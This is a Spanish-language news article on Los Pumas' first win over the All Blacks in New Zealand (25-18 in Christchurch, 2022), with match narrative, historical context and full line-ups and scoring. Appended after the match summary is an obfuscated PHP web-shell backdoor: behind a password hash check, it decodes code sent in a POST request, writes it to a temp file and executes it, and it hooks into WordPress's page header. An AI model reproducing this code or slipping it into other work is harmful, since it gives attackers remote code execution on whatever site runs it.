Los Pumas dieron otro golpe histórico ante los All Blacks, en Nueva Zelanda

Foto: UAR.

(Especial por Darío Procopio) – Los Pumas lo hicieron de nuevo. El seleccionado argentino volvió a emocionar a quienes pusieron el despertador a las 4 de la madrugada de este sábado. Los albicelestes volvieron a contagiar pasión y orgullo, desde la lejanía de tierras maoríes. Los argentinos inundaron casas en silencio con abrazos, gritos y saltos. ¿Le ganaron a los All Blacks? Sí, eso también.

El seleccionado que dirige Michael Cheika consiguió un valioso triunfo por 25 a 18 ante su par de Nueva Zelanda, los All Blacks. La victoria nacional se produce en el marco de la tercera fecha del Rugby Championship 2022 y posee el valor de histórico de ser la primera sonrisa albiceleste en tierras maoríes.

El partido se presentó parejo como han sido varios de los últimos duelos ante la gran potencia negra del deporte ovalado.  Quizás aquella derrota argentina por 38 a 0, el 26 de noviembre de 2020 sea la excepción. Pero, basta recordar por lo poco (20-16) que se escapó el triunfo argentino en Vélez por el Championship 2019 o la recordada victoria Puma en el Tri Nations 2020 (la primera y hasta hoy única ante los muchachos de negro) para comprobar que últimamente los Pumas han sabido jugarle de igual a igual a los neozelandeses.

Hoy las cosas empezaron con total paridad, al punto que promediando los primeros 20 minutos los argentinos se imponían por apenas 6 a 5. Fueron dos penales de Emiliano Boffelli contra un buen try de Samisoni Taukei’Aho, quien apoyó tras un line y maul infernal. Pero, lo importante es que la paridad en el marcador se daba en cuanto a posesión y territorio.

Quienes los han enfrentado coinciden en que la concentración y los detalles son todo a la hora de enfrentar a los All Blacks. Y basta hacer un poco de historia para recordar dos triunfos argentinos que no fueron por un solo error puntual. Aquél fallido e innecesario intento de levantada del flaco Ure en un scrum que se metía en el empate de Ferro de 1985 y el kick que Felipe Contepomi dejó dentro de la cancha en la última jugada del partido en River en 2012.

Hoy ese lapsus argentino llegó en los 20 minutos del segundo tiempo, y allí el rival juega. Más si son los All Blacks. Así, llegaron 10 puntos negros en los pies de Mo’unga y lo más preocupante en un gran try de Caleb Clark, tras el único fallo en la pared defensiva de la noche. Los locales se imponían por 15 a 6 y parecía que iba a ser la historia de siempre en suelo maorí.

Sin embargo, en los últimos 4 minutos de esa primera mitad, los All Blacks debieron cometer penales para detener a los argentinos. Uno de ellos ante un pesca perfecta de Julián Montoya, un animal del ruck. Emiliano Boffelli desde distancias y ángulos complicados se encargó de anotar y mandar a Los Pumas al descanso totalmente en partido un resultado aun adverso de apenas 15 a 12. Algo más justo con el desarrollo.

Al inicio del segundo tiempo, los All Blacks tuvieron un penal favorable y a pesar de haber marcado un try monstruoso con la combinación line y maul,  Richie Mo’unga pidió palos para sumar de a tres. Los hombres de negro se daban cuenta que no iba a ser fácil imponerse y que tres puntos les servían. Todo quedaba 18 a 12 para los locales.

Lo que ni propios ni extraños esperaban era lo que ocurrió inmediatamente después. Santiago Carreras jugó una salida perfecta que voló altísima y aterrizó sobre los 22 metros de Nueva Zelanda. Allí, Emiliano Boffelli arremetió creyente de su victoria arriba y con la locura de un fanático religioso. El rosarino les cacheteo la pelota y la ovalada le cayó en las manos calientes del tryman del seleccionado y revelación, Juan Martín González. El mendocino aprovechó que el tumulto de la salida le dio cierta invisibilidad y atacó un ciego amplio. Y los durmió. El surgido de Maristas, tiene el tamaño de un forward, pero la destreza de un back. Así, con sólo 21 años ya le marcó dos veces a los Wallabies y hoy  se dio el gran gusto de pegarles un golpe tremendo al orgullo All Black. Debe ser uno de los tries más simples que sufrieron los neozelandeses. Argentina pasaba al frente por 19 a 18.

Faltaban 25 minutos aún, pero como nunca el nerviosismo se apoderó de los All Blacks. La gente no está conforme con el entrenado Ian Foster y empezó a hacérselos saber. Pero, lo peor que le pasó a los locales hoy, sin duda fue que Los Pumas se agrandaron y apareció esa defensa que pasa de generación en generación desde aquella mágica noche de Lens contra Irlanda por la RWC 1999. No pasarán, y no pasaron, nunca más.

A la entrega individual de Los Pumas en el tackle se sumó una buena organización defensiva y la inteligencia de empezar a trabar arriba y a enlentecer todas las salidas de la pelota. Además, Emiliano Boffelli intratable con el pie les cobró con puntos cada penal y dejó cifras definitivas en 25 a 18. Así, el reloj se fue haciendo amigo de Los Pumas y llegó el segundo triunfo en la historia de los argentinos sobre los All Blacks.

El 31 de julio de 1983, en Brisbane, Los Pumas derrotaron a Australia por 18 a 3 y dieron el primer gran golpe argentino contra una potencia extranjera si consideramos que aquél triunfo de bautismo de 1965 en Sudáfrica fue ante los Junior Springboks, no el seleccionado mayor. El 14 de noviembre de 1992, el tucumano Meson metió todo en Nantes para que Francia muerda el polvo en suelo Galo ante Argentina por primera vez.

En 2006, específicamente un 11 de noviembre, el ninja Todeschini, interceptó una pelota y esa gallina robada valió el triunfo Puma en la mismísima catedral del rugby. Caía el mítico Twickenham de Londres. Los Pumas derrotaban a Inglaterra por 25 a 18 (mismo y exacto resultado que hoy). Para ese entonces ya habían caído Gales en Cardiff y Escocia en Edimburgo.

Mas acá en el tiempo, el 8 de agosto de 2015, Imhoff hacía de las suyas y Los Pumas derrotaban a los Springboks en suelo sudafricano por primera vez.

Hoy es una fecha que será agregada a esta lista, la primera vez que los grandes caen en sus casas. Hoy cayeron con justicia, nada menos que los All Blacks. Fue en Christchurch, la fortaleza inexpugnable de los Crusaders. Además de la victoria, tras tres fechas disputadas, Los Pumas lideran el Rugby Championship. A un año del mundial, la actualidad no puede ser mejor.

SINTESIS:

ALL BLACKS (18): 1. Ethan de Groot, 2. Samisoni Taukei’Aho, 3. Tyrel Lomax; 4. Samuel Whitelock, 5. Scott Barrett; 6. Shannon Frizell, 7. Sam Cane (C), 8. Ardie Savea; 9. Aaron Smith, 10. Richie Mo’unga; 11. Caleb Clarke, 12. David Havili, 13. Rieko Ioane, 14. Will Jordan; 15. Jordie Barrett.

Cambios: ST: 5′ Fletcher Newel por Ethan de Groot, Codie Taylor por Samisoni Taukei’Aho y Georgie Bower por Tyrel Lomax, 24′ Finlay Christie por Aaron Smith, 28′ Akira Ioane por Sam Cane, 30′ Quinn Tupaea por Rieko Ioane, 39′ Stephen Perofeta por Jordie Barrett

Entrenador: Ian Foster

LOS PUMAS (25): 1. Thomas Gallo, 2. Julián Montoya (C), 3. Joel Sclavi; 4. Matías Alemanno 5. Tomás Lavanini; 6. Juan Martín González, 7. Marcos Kremer, 8. Pablo Matera; 9. Gonzalo Bertranou, 10. Santiago Carreras; 11. Lucio Cinti, 12. Matías Orlando, 13. Matías Moroni, 14. Emiliano Boffelli; 15. Juan Cruz Mallía.

Cambios: 15′ Eduardo Bello por Joel Sclavi, 18′ Mayco Vivas por Thomas Gallo, 25′ Guido Petti por Matías Alemanno, 26′ Tomás Cubelli por Gonzalo Bertranou, 30′ Santiago Grondona por Juan Martín González, 33′ Santiago Corddero por Lucio Cinti, 39′ Santiago Socino por Julián Montoya

Entrenador: Michael Cheika

PUNTOS EN EL PRIMER TIEMPO: 7′ Penal convertido por Emiliano Boffelli (LP), 12′ Try de Samisoni Taukei’Aho (AB), 18′ Penal convertido por Emiliano Boffelli (LP), 30′ Penal convertido por Richie Mo’unga (AB), 32′ Try de Caleb Clarke convertido por Richie Mo’unga (AB), 37′ Penal convertido por Emiliano Boffelli (LP), 40′ Penal de Emiliano Boffelli (LP),

Resultado Parcial: All Blacks 15 (2)- Los Pumas 12

PUNTOS EN EL SEGUNDO TIEMPO: 6′ Penal convertido por Richie Mo’unga (AB), 7′ Try de Juan Martín González convertido por Emiliano Boffelli (LP), 18′ Penal convertido por Emiliano Boffelli (LP), 27′ Penal convertido por Emiliano Boffelli (LP),

Resultado Final: All Blacks 18 (2)- Los Pumas 25 (1)

AMONESTADOS: ST’: 31′ Shannon Frizell (AB)

ÁRBITRO: Nika Amashukeli (Georgia)

CANCHA: Orangetheory Stadium, Christchurch, Nueva Zelanda

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}